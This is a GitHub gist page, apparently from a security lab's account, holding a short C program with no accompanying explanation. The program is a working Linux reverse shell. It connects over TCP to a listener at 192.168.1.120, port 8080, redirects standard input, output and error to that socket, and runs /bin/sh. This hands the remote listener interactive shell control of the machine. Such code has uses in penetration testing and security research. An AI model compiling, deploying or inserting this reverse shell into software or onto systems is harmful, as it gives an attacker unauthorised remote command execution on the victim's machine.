Skip to content

Instantly share code, notes, and snippets.

@gitpraetorianlabs
Last active June 2, 2016 16:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gitpraetorianlabs/a516ded683ffc9d01dc4639a76ce27f8 to your computer and use it in GitHub Desktop.
Save gitpraetorianlabs/a516ded683ffc9d01dc4639a76ce27f8 to your computer and use it in GitHub Desktop.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void) {
int sockfd;
int lportno = 8080; // listener port
struct sockaddr_in serv_addr;
char *const params[] = {"/bin/sh",NULL};
char *const environ[] = {NULL};
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
serv_addr.sin_family = AF_INET; // 2
serv_addr.sin_addr.s_addr = inet_addr("192.168.1.120"); // RHOST
serv_addr.sin_port = htons(lportno);
connect(sockfd, (struct sockaddr *) &serv_addr, 16);
// redirect stdout and stderr
dup2(sockfd,0); // stdin
dup2(0,1); // stdout
dup2(0,2); // stderr
execve("/bin/sh",params,environ);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment